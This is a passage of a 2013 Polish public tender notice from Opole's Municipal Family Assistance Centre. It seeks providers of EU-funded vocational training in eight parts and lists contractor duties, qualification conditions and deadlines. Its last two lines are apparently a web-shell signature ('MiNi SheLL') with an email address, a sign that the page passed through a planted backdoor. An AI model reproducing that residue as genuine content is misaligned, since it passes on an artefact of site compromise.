8.	Przeprowadzenia kursów-szkoleń zgodnie z Krajowymi Standardami Kwalifikacji Zawodowych, zgodnie z obowiązującymi przepisami dotyczącymi danych kwalifikacji.
9.	Realizacji przedmiotu umowy z należytą starannością oraz czuwania nad prawidłową realizacją umowy.
10.	Indywidualizacji kształcenia poprzez prowadzenie systematycznej oceny postępów poszczególnych uczestników i zwiększenia pomocy wobec osób mających   trudności   w procesie nauczania.
11.	Zarejestrowania kursów-szkoleń w internetowej bazie ofert szkoleniowych www.inwestycjawkadry.pl, lub  www.baza.pokl.opole.pl najpóźniej w dniu rozpoczęcia zajęć danego kursu szkolenia  i poinformowania  Zamawiającego o dokonaniu rejestracji.
12.	Promocji usługi w ramach projektu  PROGRAM AKTYWIZACJI SPOŁECZNO ZAWODOWEJ BEZROBOTNYCH ORAZ  NIEAKTYWNYCH ZAWODOWO KLIENTÓW MIEJSKIEGO OŚRODKA POMOCY RODZINIE W OPOLU pn. MOJA PRACA -  MOJA PRZYSZŁOŚĆ. Promocja obejmować będzie min.: umieszczanie obowiązujących logotypów  na zaświadczeniach o ukończeniu kursu-szkolenia oraz innych dokumentach, zgodnie z Wytycznymi   dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki    ( wytyczne  dostępne są na stronie www.efs.gov.pl) łącznie z podpisem: Projekt współfinansowany ze środków  Unii Europejskiej w  ramach Europejskiego Funduszu Społecznego,   a także oznaczanie pomieszczeń,  w których będą odbywały się zajęcia  poprzez umieszczenie informacji o współfinansowaniu  w sali wykładowej w miejscu widocznym dla uczestników kursów-szkoleń lub przed wejściem do sali.
13.	Przeprowadzenia ankiet oceny kursów-szkoleń, wykładowców oraz  efektywności kursów-
             szkoleń. Wykonawca dostarczy Zamawiającemu ankiety wraz z ich opracowaniem.
14.	Dostarczenie pisemnego sprawozdania z przeprowadzonych kursów-szkoleń zawierającego 
informację o  obecnościach na zajęciach, rezygnacji z zajęć i uzyskanych kwalifikacjach przez wszystkich  uczestników kursu-szkolenia. Treść sprawozdania winna być skonsultowana i zaakceptowana przez Zamawiającego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 06.12.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dla wszystkich zadań, tj. Zadania 1 - Zadania 8: warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże się należytym wykonaniem co najmniej 3 usług szkoleniowych  polegających  na organizowaniu i  przeprowadzeniu kursów lub szkoleń zawodowych.
Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie Wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże się
w zakresie:

Zadania 1 -  co najmniej jedną osobą z minimum  1 rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących, szkołach, uczelniach, innych placówkach polegającej na prowadzeniu wykładów, ćwiczeń, seminariów, kursów, szkoleń, warsztatów,  która przeprowadziła co najmniej dwa kursy - szkolenia w zawodzie sprzedawca. 

Zadania 2 
- co najmniej jedną osobą z minimum  1 rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących, szkołach, uczelniach, innych placówkach polegającej na prowadzeniu wykładów, ćwiczeń, seminariów, kursów, szkoleń, warsztatów,  która przeprowadziła co najmniej dwa kursy - szkolenia w zawodzie magazynier. 
- co najmniej jedną osobą z minimum  1 rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących, szkołach, uczelniach, innych placówkach polegającej na prowadzeniu wykładów, ćwiczeń, seminariów, kursów, szkoleń, warsztatów,  która przeprowadziła co najmniej dwa kursy - szkolenia w zakresie nauki obsługi wózków jezdniowych. 

Zadania 3 - co najmniej jedną osobą z minimum  1 rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących, szkołach, uczelniach, innych placówkach polegającej na prowadzeniu wykładów, ćwiczeń, seminariów, kursów, szkoleń, warsztatów,  która przeprowadziła co najmniej dwa kursy - szkolenia w zawodzie opiekun osób zależnych. 

Zadania 4 - co najmniej jedną osobą z minimum  1 rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących, szkołach, uczelniach, innych placówkach polegającej na prowadzeniu wykładów, ćwiczeń, seminariów, kursów, szkoleń, warsztatów,  która przeprowadziła co najmniej dwa kursy - szkolenia z zakresu rachunkowości lub księgowości. 

Zadania 5 - co najmniej jedną osobą z minimum  1 rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących, szkołach, uczelniach, innych placówkach polegającej na prowadzeniu wykładów, ćwiczeń, seminariów, kursów, szkoleń, warsztatów,  która przeprowadziła co najmniej dwa kursy - szkolenia z zakresu administracji lub pracy biurowej.

Zadania 6 - co najmniej 1 osobą posiadającą wykształcenie informatyczne z minimum rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących, szkołach, uczelniach, innych placówkach polegającej na prowadzeniu wykładów, ćwiczeń, seminariów, kursów, szkoleń, warsztatów,  która przeprowadziła co najmniej dwa kursy - szkolenia z zakresu  grafiki komputerowej.

Zadania  7 - co najmniej jedną osobą z minimum  1 rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących, szkołach, uczelniach, innych placówkach polegającej na prowadzeniu wykładów, ćwiczeń, seminariów, kursów, szkoleń, warsztatów,  która przeprowadziła co najmniej dwa kursy - szkolenia  z zakresu  kroju i szycia.

Zadania  8 - co najmniej jedną osobą z minimum  1 rocznym doświadczeniem w pracy dydaktycznej  w jednostkach szkolących, szkołach, uczelniach, innych placówkach polegającej na prowadzeniu wykładów, ćwiczeń, seminariów, kursów, szkoleń, warsztatów,  która przeprowadziła co najmniej dwa kursy - szkolenia z zakresu obsługi maszyn do robót ziemnych.

Dokonanie oceny spełnienia warunków udziału w postępowaniu odbywać się będzie na podstawie złożonych w ofercie Wykonawcy oświadczeń i dokumentów. Zamawiający sprawdzi kompletność dokumentów, a następnie dokona sprawdzenia spełnienia warunków według zasady spełnia/nie spełnia, co musi wynikać jednoznacznie z treści oświadczeń i dokumentów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się możliwość zmian postanowień zawartych w umowie w przypadku:
1.Zmiany przepisów prawnych mających wpływ na realizację umowy, a w szczególności na jej zakres i termin.
2. Zmiany przepisów prawnych mających wpływ na cenę umowy, a w szczególności zmiany podatku VAT, wprowadzenia akcyzy.
3. Zmiany wytycznych dotyczących Programu Operacyjnego Kapitał Ludzki lub wytycznych i zaleceń Instytucji Zarządzającej lub Instytucji Pośredniczącej.
4. Zmiany umowy pomiędzy Zamawiającym a instytucjami nadzorującymi realizację projektu,
w ramach którego realizowane jest zamówienie.
5. Wyniknięcia rozbieżności lub niejasności w umowie, których nie można usunąć w inny sposób 
a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w celu jednoznacznej interpretacji jej zapisów przez Strony.
6. Zmiany nazwy, adresu firmy, spowodowane zmianą formy organizacyjno - prawnej, przekształceniem lub połączeniem z inną firmą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mopr.opole.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Opolu ul. Armii Krajowej 36, 45-071 Opole.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.09.2013 godzina 10:00, miejsce: Miejski Ośrodek Pomocy Rodzinie w Opolu ul. Armii Krajowej 36, 45-071 Opole - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> PROGRAM AKTYWIZACJI SPOŁECZNO - ZAWODOWEJ BEZROBOTNYCH 
ORAZ NIEAKTYWNYCH ZAWODOWO KLIENTÓW MIEJSKIEGO OŚRODKA POMOCY RODZINIE 
W OPOLU, pn.: MOJA PRACA - MOJA PRZYSZŁOŚĆ realizowanego w ramach Programu Operacyjnego Kapitał Ludzki, współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com